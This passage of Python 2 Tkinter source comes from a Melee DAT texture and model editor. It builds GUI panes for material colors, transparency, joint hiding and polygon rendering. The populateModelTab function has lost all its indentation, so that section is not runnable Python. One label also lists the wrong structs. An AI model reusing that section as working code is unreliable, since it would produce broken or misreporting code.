			Gui.imageManipTabs.select( Gui.textureTreeImagePane )
		Gui.imageManipTabs.tab( Gui.palettePane, state='disabled' )

	wraplength = Gui.imageManipTabs.winfo_width() - 20
	lackOfUsefulStructsDescription = ''

	# Check if this is a file that doesn't have image data headers :(
	if (0x1E00, 'MemSnapIconData') in globalDatFile.rootNodes: # The file is LbMcSnap.usd or LbMcSnap.dat (Memory card banner/icon file from SSB Melee)
		lackOfUsefulStructsDescription = 'This file has no known image data headers, or other structures to modify.'
	elif (0x4E00, 'MemCardIconData') in globalDatFile.rootNodes: # The file is LbMcGame.usd or LbMcGame.dat (Memory card banner/icon file from SSB Melee)
		lackOfUsefulStructsDescription = 'This file has no known image data headers, or other structures to modify.'
	elif (0, 'SIS_MenuData') in globalDatFile.rootNodes: # SdMenu.dat/.usd
		lackOfUsefulStructsDescription = 'This file has no known image data headers, or other structures to modify.'
	elif isEffectsFile( globalDatFile ):
		lastEffTextureOffset = getattr( globalDatFile, 'lastEffTexture', -1 ) # Only relavant with effects files

		if imageDataOffset <= lastEffTextureOffset:
			# NOTE(review): assumes imageDataStruct exists for effects textures in this range — confirm
			e2eHeaderOffset = imageDataStruct.imageHeaderOffset
			textureCount = struct.unpack( '>I', globalDatFile.getData(e2eHeaderOffset, 4) )[0]

			lackOfUsefulStructsDescription = ( 'Effects files have unique structuring for some textures, like this one, '
								'which do not have a typical image data header, texture object, or other common structures.' )
			if textureCount == 1:
				lackOfUsefulStructsDescription += ' This texture is not grouped with any other textures,'
			elif textureCount == 2:
				lackOfUsefulStructsDescription += ' This texture is grouped with 1 other texture,'
			else:
				# textureCount includes this texture itself, so report one less
				# (bug fix: previously formatted textureCount here, overcounting by one)
				lackOfUsefulStructsDescription += ' This texture is grouped with {} other textures,'.format( textureCount - 1 )
			lackOfUsefulStructsDescription += ' with an E2E header at 0x{:X}.'.format( 0x20+e2eHeaderOffset )
	elif not imageDataStruct: # Make sure an image data struct exists to check if this might be something like a DOL texture
		lackOfUsefulStructsDescription = ( 'There are no image data headers or other structures associated '
							'with this texture. These are stored end-to-end in this file with '
							'other similar textures.' )
	elif not imageDataHeaderOffsets:
		lackOfUsefulStructsDescription = 'This file has no known image data headers, or other structures to modify.'

	Gui.texturePropertiesPane.clear()
	Gui.texturePropertiesPane.flagWidgets = [] # Useful for the Flag Decoder to more easily find widgets that need updating

	# If the following string has something, there isn't much customization to be done for this texture
	if lackOfUsefulStructsDescription:
		# Disable the model parts tab, and if on that tab, switch to the Image tab.
		if currentTab == Gui.modelPropertiesPane:
			Gui.imageManipTabs.select( Gui.textureTreeImagePane )
		Gui.imageManipTabs.tab( Gui.modelPropertiesPane, state='disabled' )

		# Add some info to the texture properties tab
		Gui.imageManipTabs.tab( Gui.texturePropertiesPane, state='normal' )
		ttk.Label( Gui.texturePropertiesPane.interior, text=lackOfUsefulStructsDescription, wraplength=wraplength ).pack( pady=30 )

		return # Nothing more to say about this texture

	# Enable and update the Model tab
	Gui.imageManipTabs.tab( Gui.modelPropertiesPane, state='normal' )
	populateModelTab( imageDataHeaderOffsets, wraplength )

	# Enable and update the Properties tab
	Gui.imageManipTabs.tab( Gui.texturePropertiesPane, state='normal' )
	populateTexPropertiesTab( wraplength, width, height, imageType )
def populateModelTab( imageDataHeaderOffsets, wraplength ):
modelPane = Gui.modelPropertiesPane.interior
vertPadding = 10
# Clear the current contents
Gui.modelPropertiesPane.clear()
modelPane.imageDataHeaders = []
modelPane.nonImageDataHeaders = [] # Not expected
modelPane.textureStructs = [] # Direct model attachments
modelPane.headerArrayStructs = [] # Used for animations
modelPane.unexpectedStructs = []
# Double-check that all of the parents are actually image data headers, and get grandparent structs
for imageHeaderOffset in imageDataHeaderOffsets: # This should exclude any root/reference node parents (such as a label)
headerStruct = globalDatFile.initSpecificStruct( hsdStructures.ImageObjDesc, imageHeaderOffset )
if headerStruct:
modelPane.imageDataHeaders.append( headerStruct )
# Check the grandparent structs; expected to be Texture Structs or Image Data Header Arrays
for grandparentOffset in headerStruct.getParents():
texStruct = globalDatFile.initSpecificStruct( hsdStructures.TextureObjDesc, grandparentOffset, printWarnings=False )
# Try getting or initializing a Texture Struct
if texStruct:
modelPane.textureStructs.append( texStruct )
else:
arrayStruct = globalDatFile.initSpecificStruct( hsdStructures.ImageHeaderArray, grandparentOffset, printWarnings=False )
# Try getting or initializing an Image Header Array Struct
if arrayStruct:
modelPane.headerArrayStructs.append( arrayStruct )
else:
# Initialize a general struct
modelPane.unexpectedStructs.append( globalDatFile.getStruct( grandparentOffset ) )
else:
# Attempt to initialize it in a generalized way (attempts to identify; returns a general struct if unable)
modelPane.nonImageDataHeaders.append( globalDatFile.getStruct(imageHeaderOffset) )
# Add a label for image data headers count
if len( modelPane.imageDataHeaders ) == 1: # todo: make searching work for multiple offsets
headerCountFrame = ttk.Frame( modelPane )
ttk.Label( headerCountFrame, text='Model Attachments (Image Data Headers): {}'.format(len(modelPane.imageDataHeaders)), wraplength=wraplength ).pack( side='left' )
PointerLink( headerCountFrame, modelPane.imageDataHeaders[0].offset ).pack( side='right', padx=5 )
headerCountFrame.pack( pady=(vertPadding*2, 0) )
else:
ttk.Label( modelPane, text='Model Attachments (Image Data Headers): {}'.format(len(modelPane.imageDataHeaders)), wraplength=wraplength ).pack( pady=(vertPadding*2, 0) )
# Add a notice of non image data header structs, if any.
if modelPane.nonImageDataHeaders:
print 'Non-Image Data Header detected as image data block parent!'
if len( modelPane.nonImageDataHeaders ) == 1:
nonImageDataHeadersText = '1 non-image data header detected: ' + modelPane.nonImageDataHeaders[0].name
else:
structNamesString = grammarfyList( [structure.name for structure in modelPane.nonImageDataHeaders] )
nonImageDataHeadersText = '{} non-image data headers detected: {}'.format( len(modelPane.nonImageDataHeaders), structNamesString )
ttk.Label( modelPane, text=nonImageDataHeadersText, wraplength=wraplength ).pack( pady=(vertPadding, 0) )
# Add details for Texture Struct or Material Struct attachments
if len( modelPane.textureStructs ) == 1:
textStructsText = 'Associated with 1 Texture Struct.'
else:
textStructsText = 'Associated with {} Texture Structs.'.format( len(modelPane.textureStructs) )
ttk.Label( modelPane, text=textStructsText, wraplength=wraplength ).pack( pady=(vertPadding, 0) )
if len( modelPane.headerArrayStructs ) == 1:
arrayStructsText = 'Associated with 1 Material Animation.'
else:
arrayStructsText = 'Associated with {} Material Animations.'.format( len(modelPane.headerArrayStructs) )
ttk.Label( modelPane, text=arrayStructsText, wraplength=wraplength ).pack( pady=(vertPadding, 0) )
if modelPane.unexpectedStructs:
unexpectedStructsText = 'Unexpected Grandparent Structs: ' + grammarfyList( [structure.name for structure in modelPane.nonImageDataHeaders] )
ttk.Label( modelPane, text=unexpectedStructsText, wraplength=wraplength ).pack( pady=(vertPadding, 0) )
ttk.Separator( modelPane, orient='horizontal' ).pack( fill='x', padx=24, pady=(vertPadding*2, vertPadding) )
# Get the associated material structs and display objects
modelPane.materialStructs = []
modelPane.displayObjects = []
for texStruct in modelPane.textureStructs:
for materialStructOffset in texStruct.getParents():
materialStruct = globalDatFile.initSpecificStruct( hsdStructures.MaterialObjDesc, materialStructOffset )
if materialStruct:
modelPane.materialStructs.append( materialStruct )
for displayObjOffset in materialStruct.getParents():
displayObject = globalDatFile.initSpecificStruct( hsdStructures.DisplayObjDesc, displayObjOffset )
if displayObject:
modelPane.displayObjects.append( displayObject )
# Display controls to adjust this texture's model transparency
# Set up the transparency control panel and initialize the control variables
transparencyPane = ttk.Frame( modelPane )
jointHidden = Tk.BooleanVar()
displayListDisabled = Tk.BooleanVar() # Whether or not display list length has been set to 0
modelPane.hideJointChkBtn = ttk.Checkbutton( transparencyPane, text='Disable Joint Rendering', variable=jointHidden, command=toggleHideJoint )
modelPane.hideJointChkBtn.var = jointHidden
modelPane.hideJointChkBtn.grid( column=0, row=0, sticky='w', columnspan=3 )
modelPane.polyDisableChkBtn = ttk.Checkbutton( transparencyPane, text='Disable Polygon (Display List) Rendering', variable=displayListDisabled, command=toggleDisplayListRendering )
modelPane.polyDisableChkBtn.var = displayListDisabled
modelPane.polyDisableChkBtn.grid( column=0, row=1, sticky='w', columnspan=3 )
ttk.Label( transparencyPane, text='Transparency Control:' ).grid( column=0, row=2, sticky='w', columnspan=3, padx=15, pady=(3, 4) )
opacityValidationRegistration = Gui.root.register( opacityEntryUpdated )
modelPane.opacityEntry = ttk.Entry( transparencyPane, width=7, justify='center', validate='key', validatecommand=(opacityValidationRegistration, '%P') )
modelPane.opacityEntry.grid( column=0, row=3 )
modelPane.opacityBtn = ttk.Button( transparencyPane, text='Set', command=setModelTransparencyLevel, width=4 )
modelPane.opacityBtn.grid( column=1, row=3, padx=4 )
modelPane.opacityScale = ttk.Scale( transparencyPane, from_=0, to=10, command=opacityScaleUpdated )
modelPane.opacityScale.grid( column=2, row=3, sticky='we' )
transparencyPane.pack( pady=(vertPadding, 0), expand=True, fill='x', padx=20 )
transparencyPane.columnconfigure( 0, weight=0 )
transparencyPane.columnconfigure( 1, weight=0 )
transparencyPane.columnconfigure( 2, weight=1 )
# Add a help button for texture/model disablement and transparency
helpText = ( 'Disabling Joint Rendering will set the "Hidden" flag (bit 4) for all of the lowest-level Joint Structures '
"connected to the selected texture (parents to this texture's Display Object(s)). That will be just "
"one particular Joint Struct in most cases, however that may be the parent for multiple parts of the model. "
"To have finer control over which model parts are disabled, consider the Disable Polygon Rendering option."
"\n\nDisabling Polygon Rendering is achieved by setting the display list data stream size to 0 "
"""(i.e. each associated Polygon Objects' "Display List Length"/"Display List Blocks" value). This is """
"done for each Polygon Object of each Display Object associated with this texture. For finer control, use "
'the Structural Analysis tab. There, you can even experiment with reducing the length of the list '
'to some other value between 0 and the original value, to render or hide different polygon groups.'
'\n\nTransparency Control makes the entire model part that this texture is attached to partially transparent. '
'This uses the value found in the Material Colors Struct by the same name, while setting multiple flags '
"within parenting structures. The flags set are 'Render No Z-Update' and 'Render XLU' of the Material Structs "
"(bits 29 and 30, respectfully), as well as 'XLU' and 'Root XLU' of the Joint Struct (bits 19 and 29). " )
helpBtn = ttk.Label( transparencyPane, text='?', foreground='#445', cursor='hand2' )
helpBtn.place( relx=1, x=-17, y=0 )
helpBtn.bind( '<1>', lambda e, message=helpText: msg(message, 'Disabling Rendering and Transparency') )
# Add widgets for Material Color editing
ttk.Separator( modelPane, orient='horizontal' ).pack( fill='x', padx=24, pady=(vertPadding*2, vertPadding) )
ttk.Label( modelPane, text='Material Colors:' ).pack( pady=(vertPadding, 0) )
colorsPane = ttk.Frame( modelPane )
# Row 1; Diffusion and Ambience
ttk.Label( colorsPane, text='Diffusion:' ).grid( column=0, row=0, sticky='e' )
diffusionEntry = HexEditEntry( colorsPane, -1, 4, 'I', 'Diffusion' ) # Data offset (the -1) will be updated below
diffusionEntry.grid( column=1, row=0, padx=6 )
ttk.Label( colorsPane, text='Ambience:' ).grid( column=3, row=0, sticky='e' )
ambienceEntry = HexEditEntry( colorsPane, -1, 4, 'I', 'Ambience' ) # Data offset (the -1) will be updated below
ambienceEntry.grid( column=4, row=0, padx=6 )
# Row 2; Specular Highlights and Shininess
ttk.Label( colorsPane, text='Highlights:' ).grid( column=0, row=1, sticky='e', padx=(12, 0) )
highlightsEntry = HexEditEntry( colorsPane, -1, 4, 'I', 'Specular Highlights' ) # Data offset (the -1) will be updated below
highlightsEntry.grid( column=1, row=1, padx=6 )
ttk.Label( colorsPane, text='Shininess:' ).grid( column=3, row=1, sticky='e', padx=(12, 0) )
shininessEntry = HexEditEntry( colorsPane, -1, 4, 'f', 'Shininess' ) # Data offset (the -1) will be updated below
shininessEntry.grid( column=4, row=1, padx=6 )
colorsPane.pack( pady=(vertPadding, 0), expand=True, fill='x', padx=20 )
# print 'material structs:', [hex(0x20+obj.offset) for obj in modelPane.materialStructs]
# print 'displayObj structs:', [hex(0x20+obj.offset) for obj in modelPane.displayObjects]
# Set initial values for the transparency controls and material colors above, or disable them
if modelPane.displayObjects:
firstDisplayObj = modelPane.displayObjects[0]
# Get a parent Joint Object, and see if its hidden flag is set
for structureOffset in firstDisplayObj.getParents():
jointStruct = globalDatFile.initSpecificStruct( hsdStructures.JointObjDesc, structureOffset )
if jointStruct:
jointFlags = jointStruct.getValues( specificValue='Joint_Flags' )
jointHidden.set( jointFlags & 0b10000 ) # Checking bit 4
break
else: # The loop above didn't break; no joint struct parent found
modelPane.hideJointChkBtn.configure( state='disabled' )
ToolTip( modelPane.hideJointChkBtn, '(No parent Joint Object found.)', wraplength=400 )
# Check the current state of this model part's rendering; get the first Polygon Object, and see if its Display List Blocks/Length attribute is 0
polygonObjOffset = firstDisplayObj.getValues( specificValue='Polygon_Object_Pointer' )
polygonObj = globalDatFile.initSpecificStruct( hsdStructures.PolygonObjDesc, polygonObjOffset, firstDisplayObj.offset )
if polygonObj:
displayListBlocks = polygonObj.getValues( 'Display_List_Length' )
displayListDisabled.set( not bool(displayListBlocks) ) # Resolves to True if the value is 0, False for anything else
else:
displayListDisabled.set( False )
modelPane.polyDisableChkBtn.configure( state='disabled' )
# If we found display objects, we must have also found material structs; get its values
materialStruct = modelPane.materialStructs[0]
matColorsOffset = materialStruct.getValues()[3]
matColorsStruct = globalDatFile.initSpecificStruct( hsdStructures.MaterialColorObjDesc, matColorsOffset, materialStruct.offset )
diffusion, ambience, specularHighlights, transparency, shininess = matColorsStruct.getValues()
# Get all of the offsets that would be required to update the material color values
diffusionHexOffsets = []
ambienceHexOffsets = []
highlightsHexOffsets = []
shininessHexOffsets = []
for materialStruct in modelPane.materialStructs:
matColorsStructOffset = materialStruct.getValues( 'Material_Colors_Pointer' )
diffusionHexOffsets.append( matColorsStructOffset )
ambienceHexOffsets.append( matColorsStructOffset + 4 )
highlightsHexOffsets.append( matColorsStructOffset + 8 )
shininessHexOffsets.append( matColorsStructOffset + 0x10 )
# Set the transparency slider's value (which will also update the Entry widget's value)
modelPane.opacityScale.set( transparency * 10 ) # Multiplied by 10 because the slider's range is 0 to 10 (to compensate for trough-click behavior)
# Add an event handler to forces focus to go to the slider when it's clicked on (dunno why it doesn't do this already).
# This is necessary for the opacityScaleUpdated function to work properly
modelPane.opacityScale.bind( '<Button-1>', lambda event: modelPane.opacityScale.focus() )
# Add these values and color swatches to the GUI
diffusionHexString = '{0:0{1}X}'.format( diffusion, 8 ) # Avoids the '0x' and 'L' appendages brought on by the hex() function. pads to 8 characters
ambienceHexString = '{0:0{1}X}'.format( ambience, 8 ) # Avoids the '0x' and 'L' appendages brought on by the hex() function. pads to 8 characters
highlightsHexString = '{0:0{1}X}'.format( specularHighlights, 8 ) # Avoids the '0x' and 'L' appendages brought on by the hex() function. pads to 8 characters
diffusionEntry.insert( 0, diffusionHexString )
diffusionEntry.offsets = diffusionHexOffsets
diffusionEntry.colorSwatch = ColorSwatch( colorsPane, diffusionHexString, diffusionEntry )
diffusionEntry.colorSwatch.grid( column=2, row=0, padx=(0,2) )
ambienceEntry.insert( 0, ambienceHexString )
ambienceEntry.offsets = ambienceHexOffsets
ambienceEntry.colorSwatch = ColorSwatch( colorsPane, ambienceHexString, ambienceEntry )
ambienceEntry.colorSwatch.grid( column=5, row=0, padx=(0,2) )
highlightsEntry.insert( 0, highlightsHexString )
highlightsEntry.offsets = highlightsHexOffsets
highlightsEntry.colorSwatch = ColorSwatch( colorsPane, highlightsHexString, highlightsEntry )
highlightsEntry.colorSwatch.grid( column=2, row=1, padx=(0,2) )
shininessEntry.insert( 0, shininess )
shininessEntry.offsets = shininessHexOffsets
# Add bindings for input submission
diffusionEntry.bind( '<Return>', updateEntryHex )
ambienceEntry.bind( '<Return>', updateEntryHex )
highlightsEntry.bind( '<Return>', updateEntryHex )
shininessEntry.bind( '<Return>', updateEntryHex )
else:
# Disable the render checkbuttons and transparency controls
modelPane.hideJointChkBtn.configure( state='disabled' )
modelPane.polyDisableChkBtn.configure( state='disabled' )
modelPane.opacityEntry.configure( state='disabled' )
modelPane.opacityBtn.configure( state='disabled' )
# Disable the Material Color inputs
diffusionEntry.configure( state='disabled' )
ambienceEntry.configure( state='disabled' )
highlightsEntry.configure( state='disabled' )
shininessEntry.configure( state='disabled' )
# Add a label explaining why these are disabled
disabledControlsText = ('These controls are disabled because no Display Objects or Material Structs directly associated with this texture. '
'If this is part of a texture animation, find the default texture for it and adjust that instead.' )
ttk.Label( modelPane, text=disabledControlsText, wraplength=wraplength ).pack( pady=(vertPadding, 0) )
def toggleHideJoint():

	""" Sets or clears the 'Hidden' flag (bit 4) on every Joint Struct parenting the texture
		currently selected in the DAT Texture Tree tab (last item in the selection if multiple
		items are selected), according to the checkbox's current state. """

	interior = Gui.modelPropertiesPane.interior
	newHiddenState = interior.hideJointChkBtn.var.get()
	processedOffsets = [] # Joint offsets already handled, so shared parents aren't updated twice

	# Walk each display object's parent structs, updating the flag on every unique joint found
	for dobj in interior.displayObjects:
		for jointOffset in dobj.getParents():
			joint = globalDatFile.initSpecificStruct( hsdStructures.JointObjDesc, jointOffset )

			if not joint or jointOffset in processedOffsets:
				continue

			# Update the bit in both the struct's values and the file data
			globalDatFile.updateFlag( joint, 1, 4, newHiddenState )
			processedOffsets.append( jointOffset )

	updateProgramStatus( 'Joint Flag Updated' )
def toggleDisplayListRendering():

	""" Enables or disables polygon rendering for the texture currently selected in the DAT
		Texture Tree tab (last item in the selection if multiple items are selected), by
		zeroing out -- or restoring from the calculated structure length -- the display list
		length of every associated Polygon Object. """

	disableRendering = Gui.modelPropertiesPane.interior.polyDisableChkBtn.var.get()

	for displayObj in Gui.modelPropertiesPane.interior.displayObjects:
		# Collect this display object's polygon object along with all of its siblings
		firstPolygonOffset = displayObj.getValues( 'Polygon_Object_Pointer' )
		firstPolygon = globalDatFile.initSpecificStruct( hsdStructures.PolygonObjDesc, firstPolygonOffset, displayObj.offset )
		allPolygons = [ firstPolygon ] + [ globalDatFile.structs[o] for o in firstPolygon.getSiblings() ] # Siblings are initialized by the .getSiblings method

		for polygonStruct in allPolygons:
			# Look up this polygon object's display list pointer, and derive the expected list length from the structure size
			currentListLength, displayListPointer = polygonStruct.getValues()[4:6]
			calculatedListLength = globalDatFile.getStructLength( displayListPointer ) / 0x20

			if disableRendering:
				# Warn if the stored length doesn't match the calculated one, since zeroing it would lose that value
				if currentListLength != calculatedListLength:
					msg( 'Warning! The display list length of ' + polygonStruct.name + ' was not the expected calculated value; '
						'The current value is {}, while it was expected to be {}. '.format( currentListLength, calculatedListLength ) + \
						"This means if you want to be able to restore this value later, you'll need to write the current value "
						'down, so you can restore it manually in the Structural Analysis tab.', 'Unexpected Display List Length' )
				globalDatFile.updateStructValue( polygonStruct, 4, 0 )
			else:
				globalDatFile.updateStructValue( polygonStruct, 4, calculatedListLength )

	updateProgramStatus( 'Polygon Structs Updated' )
def opacityEntryUpdated( newValue ):

	""" Validation function for the transparency Entry widget (registered with Tk via
		'validatecommand', receiving the prospective contents as the '%P' substitution).
		Parses the entered percentage string, rejects anything that isn't a number between
		0 and 100, and syncs accepted values to the slider (which uses a 0-10 range).

			newValue: the Entry's prospective contents; always a string

		Returns True to accept the new Entry contents, or False to reject them. """

	# Parse the input; '%' signs are allowed and ignored, and an empty field counts as 0
	try:
		newValue = float( newValue.replace( '%', '' ) )
	except ValueError: # Narrowed from a bare except; '%P' always supplies a string, so only parse failures can occur
		if newValue == '':
			newValue = 0
		else:
			return False

	if newValue < 0 or newValue > 100:
		return False

	# Set the slider to the current value (scaled down to its 0-10 range)
	newValue = newValue / 10
	Gui.modelPropertiesPane.interior.opacityScale.set( newValue )

	return True
def opacityScaleUpdated( newValue ):

	""" Called whenever the transparency slider moves. Mirrors the slider's value (a float
		in the 0-10 range, given as a string) into the Entry widget as a percentage --
		unless the Entry itself has focus and is the one driving the change. """

	roundedValue = round( float(newValue), 2 )
	entryWidget = Gui.modelPropertiesPane.interior.opacityEntry

	if Gui.root.focus_get() == entryWidget:
		return # The Entry widget caused this change, so it's already up to date

	# Suspend key validation while rewriting the Entry's contents, so the validator isn't re-triggered
	entryWidget.configure( validate='none')
	entryWidget.delete( 0, 'end' )
	entryWidget.insert( 0, str(roundedValue*10) + '%' )
	entryWidget.configure( validate='key')
def setModelTransparencyLevel():

	""" Calling function of the "Set" button under the Model tab's Transparency Control.

		Writes the slider's transparency value (scaled to 0-1.0) into the Material Colors
		Struct of every material associated with the selected texture. When the value makes
		the part translucent (< 1.0), also sets the render flags that transparency requires
		in the parenting Material Structs and Joint Structs. """

	opacityValue = Gui.modelPropertiesPane.interior.opacityScale.get() / 10 # Slider range is 0-10; scale down to 0-1.0

	# Update the transparency value, and set required flags for this in the Material Struct
	for materialStruct in Gui.modelPropertiesPane.interior.materialStructs:
		matColorsOffset = materialStruct.getValues( 'Material_Colors_Pointer' )
		matColorsStruct = globalDatFile.initSpecificStruct( hsdStructures.MaterialColorObjDesc, matColorsOffset, materialStruct.offset )

		if matColorsStruct: # If the Material Struct doesn't have its colors struct, we probably don't need to worry about modifying it
			# Change the transparency value within the struct values and file data, and record that the change was made
			globalDatFile.updateStructValue( matColorsStruct, -2, opacityValue ) # -2 targets the Transparency field (second-to-last value)

			if opacityValue < 1.0: # Set the required flags (RENDER_NO_ZUPDATE and RENDER_XLU; i.e. bits 29 and 30)
				globalDatFile.updateFlag( materialStruct, 1, 29, True ) # RENDER_NO_ZUPDATE
				globalDatFile.updateFlag( materialStruct, 1, 30, True ) # RENDER_XLU
			# else:
			# 	globalDatFile.updateFlag( materialStruct, 1, 29, False )
			# 	globalDatFile.updateFlag( materialStruct, 1, 30, False )

	if opacityValue < 1.0: # Set flags required for this in the Joint Struct(s)
		modifiedJoints = [] # Tracks which joint flags we've already updated, to reduce redundancy

		# Iterate over the display objects of this texture, get their parent joint objects, and modify their flag
		for displayObj in Gui.modelPropertiesPane.interior.displayObjects:
			parentJointOffsets = displayObj.getParents()

			for parentStructOffset in parentJointOffsets:
				jointStruct = globalDatFile.initSpecificStruct( hsdStructures.JointObjDesc, parentStructOffset )

				if jointStruct and parentStructOffset not in modifiedJoints:
					# Change the bit within the struct values and file data, and record that the change was made
					globalDatFile.updateFlag( jointStruct, 1, 19, True ) # XLU
					#globalDatFile.updateFlag( jointStruct, 1, 28, True ) # ROOT_OPA
					globalDatFile.updateFlag( jointStruct, 1, 29, True ) # ROOT_XLU
					modifiedJoints.append( parentStructOffset )

	updateProgramStatus( 'Transparency Updated' )
class EnumOptionMenu( ttk.OptionMenu ):

	""" A dropdown menu for struct fields that use enumerations. Presents the enumeration
		names to the user, and writes the corresponding enumeration value back into the
		file when a new option is chosen. """

	def __init__( self, parent, structures, fieldIndex ):
		""" structures may be a single structure object, or a list of structures that
			should all be updated together when a new option is selected. """

		self.structures = structures
		self.fieldIndex = fieldIndex

		if type( structures ) == list:
			structure = structures[0]
		else: # It's just one structure object
			structure = structures

		# Get the current value of the enumeration
		self.currentEnum = structure.getValues()[fieldIndex]
		self.fieldName = structure.fields[fieldIndex]

		# Enumerations must be provided by the structure class
		self.enumerations = structure.enums[self.fieldName] # Retrieves a dictionary of the form key=enumInt, value=enumNameString
		self.optionNames = list( self.enumerations.values() )

		defaultOption = self.enumerations[self.currentEnum]
		textVar = Tk.StringVar() # Required to init the optionmenu
		ttk.OptionMenu.__init__( self, parent, textVar, defaultOption, *self.optionNames, command=self.optionSelected )

	def optionSelected( self, newOption ):
		""" Writes the enum value for the chosen option name into the target structure(s). """

		# Convert the option name back to its enumeration value. A reverse lookup on the enum
		# dictionary is used rather than the option's list position (the previous approach),
		# which was only correct for contiguous, 0-based enums in dict-iteration order.
		for enumValue, enumName in self.enumerations.items():
			if enumName == newOption:
				newEnum = enumValue
				break
		else: # The loop above didn't break; no matching name (shouldn't happen with menu-supplied options)
			return

		if newEnum == self.currentEnum:
			return # Nothing to do here

		# Replace the data in the file and structure for each one
		updateName = self.fieldName.replace( '\n', ' ' )
		descriptionOfChange = updateName + ' modified in ' + globalDatFile.fileName

		if type( self.structures ) == list:
			for structure in self.structures:
				globalDatFile.updateStructValue( structure, self.fieldIndex, newEnum, descriptionOfChange )
		else: # The offsets attribute is just a single struct (the usual case)
			globalDatFile.updateStructValue( self.structures, self.fieldIndex, newEnum, descriptionOfChange )

		# Remember the new value; previously this was never updated, so re-selecting
		# the original option after a change was silently ignored.
		self.currentEnum = newEnum

		updateProgramStatus( updateName + ' Updated' )
def populateTexPropertiesTab( wraplength, width, height, thisImageType ):
	""" Populates the Properties tab of the DAT Texture Tree interface. At this point, the pane has already been cleared.

			wraplength:    max pixel width for label text before it wraps
			width, height: dimensions of the currently selected texture
			thisImageType: TPL image format of the currently selected texture

		Builds editing controls for the Texture Struct(s), Material Struct(s), and Pixel
		Processing struct(s) tied to the selected texture. Values that differ across the
		multiple structs being edited are highlighted with an orange border and trigger a
		warning label at the bottom of the pane. """
	propertiesPane = Gui.texturePropertiesPane.interior
	texStructs = Gui.modelPropertiesPane.interior.textureStructs
	matStructs = Gui.modelPropertiesPane.interior.materialStructs
	pixStructs = [] # Pixel Processing structures
	vertPadding = 10
	# Make sure there are Texture Structs to edit
	if not texStructs:
		noTexStructText = ( 'No Texture Structs found; there are no editable properties. If this texture is part of '
							'a material animation, find the default texture for that animation and edit that instead.' )
		ttk.Label( propertiesPane, text=noTexStructText, wraplength=wraplength ).pack( pady=vertPadding*2 )
		return
	# Collect offsets that we'll need for the HexEditEntries.
	# Also, get the flags data, and check if they're the same across all tex structs for this texture.
	# Sets are used for the data so that duplicates collapse; len() > 1 afterwards means
	# the structs disagree on that value.
	matFlagOffsets = [ matStruct.offset+4 for matStruct in matStructs ]
	texFlagFieldOffsets = []
	pixelProcFlagOffsets = []
	blendingOffsets = []
	wrapModeSoffsets = []
	wrapModeToffsets = []
	reapeatSoffsets = []
	reapeatToffsets = []
	matFlagsData = set()
	texFlagsData = set()
	pixFlagsData = set()
	blendingData = set()
	wrapSData = set()
	wrapTData = set()
	repeatSData = set()
	repeatTData = set()
	# Populate the above lists with the actual hex data from the file
	# (offsets below are relative to each Texture Struct's start)
	for texStruct in texStructs:
		texFlagFieldOffsets.append( texStruct.offset + 0x40 )
		wrapModeSoffsets.append( texStruct.offset + 0x34 )
		wrapModeToffsets.append( texStruct.offset + 0x38 )
		reapeatSoffsets.append( texStruct.offset + 0x3C )
		reapeatToffsets.append( texStruct.offset + 0x3D )
		texFlagsData.add( hexlify(texStruct.data[0x40:0x44]) )
		wrapSData.add( hexlify(texStruct.data[0x34:0x38]) )
		wrapTData.add( hexlify(texStruct.data[0x38:0x3C]) )
		repeatSData.add( hexlify(texStruct.data[0x3C:0x3D]) )
		repeatTData.add( hexlify(texStruct.data[0x3D:0x3E]) )
	for matStructure in matStructs:
		matFlagsData.add( hexlify(matStructure.data[0x4:0x8]) )
		# Check if there's a valid pointer to a Pixel Proc. structure, and get flags from it if there is
		if matStructure.offset + 0x14 in globalDatFile.pointerOffsets:
			pixelProcStructOffset = matStructure.getValues()[-1]
			pixProcStruct = globalDatFile.initSpecificStruct( hsdStructures.PixelProcObjDesc, pixelProcStructOffset, matStructure.offset )
			if pixProcStruct:
				pixStructs.append( pixProcStruct )
				pixelProcFlagOffsets.append( pixelProcStructOffset )
				pixFlagsData.add( hexlify(globalDatFile.getData(pixelProcStructOffset, 1)) )
				blendingOffsets.append( pixelProcStructOffset + 4 )
				blendingData.add( ord(globalDatFile.getData(pixelProcStructOffset+4, 1)) ) # Stored as an int, unlike the hex strings above
	displayDifferingDataWarning = False
	# Describe the number of Texture Structs found
	if len( texStructs ) == 1:
		texCountLabel = ttk.Label( propertiesPane, text='These controls will edit 1 set of structures.', wraplength=wraplength )
	else:
		texCountLabelText = 'These controls will edit {} sets of structures.\nTo edit individual structs, use the Structural Analysis tab.'.format( len(texStructs) )
		texCountLabel = ttk.Label( propertiesPane, text=texCountLabelText, wraplength=wraplength )
	texCountLabel.pack( pady=(vertPadding*2, 0) )
	ttk.Separator( propertiesPane, orient='horizontal' ).pack( fill='x', padx=24, pady=(vertPadding*2, 0) )
	flagsFrame = Tk.Frame( propertiesPane )
	if len( pixFlagsData ) > 0: # At least one Pixel Processing struct was found above
		# Add blending options
		ttk.Label( flagsFrame, text='Blending Mode:' ).grid( column=0, row=0, sticky='e' )
		if len( blendingData ) > 1: # Add a 2 px border around the widget using a Frame (the widget itself doesn't support a border)
			optionMenuBorderFrame = Tk.Frame( flagsFrame, background='orange' )
			blendingMenu = EnumOptionMenu( optionMenuBorderFrame, pixStructs, 4 )
			blendingMenu.pack( padx=2, pady=2 )
			optionMenuBorderFrame.grid( column=1, row=0, columnspan=2, padx=7 )
			displayDifferingDataWarning = True
		else:
			blendingMenu = EnumOptionMenu( flagsFrame, pixStructs[0], 4 )
			blendingMenu.grid( column=1, row=0, columnspan=2, padx=7 )
		# Add widgets for the Pixel Processing Flags label, hex edit Entry, and Flags 'Decode' button
		ttk.Label( flagsFrame, text='Pixel Processing Flags:' ).grid( column=0, row=1, sticky='e' )
		hexEntry = HexEditEntry( flagsFrame, pixelProcFlagOffsets, 1, 'B', 'Pixel Processing Flags' )
		hexEntry.insert( 0, next(iter(pixFlagsData)).upper() ) # Shows an arbitrary member of the set (they may differ)
		hexEntry.bind( '<Return>', updateEntryHex )
		hexEntry.grid( column=1, row=1, padx=7, pady=1 )
		Gui.texturePropertiesPane.flagWidgets.append( hexEntry )
		if len( pixFlagsData ) > 1:
			hexEntry['highlightbackground'] = 'orange'
			hexEntry['highlightthickness'] = 2
			displayDifferingDataWarning = True
		flagsLabel = ttk.Label( flagsFrame, text='Decode', foreground='#00F', cursor='hand2' )
		flagsLabel.grid( column=2, row=1, pady=0 )
		flagsLabel.bind( '<1>', lambda e, s=pixStructs[0], fO=pixelProcFlagOffsets: FlagDecoder(s, fO, 0) )
	else:
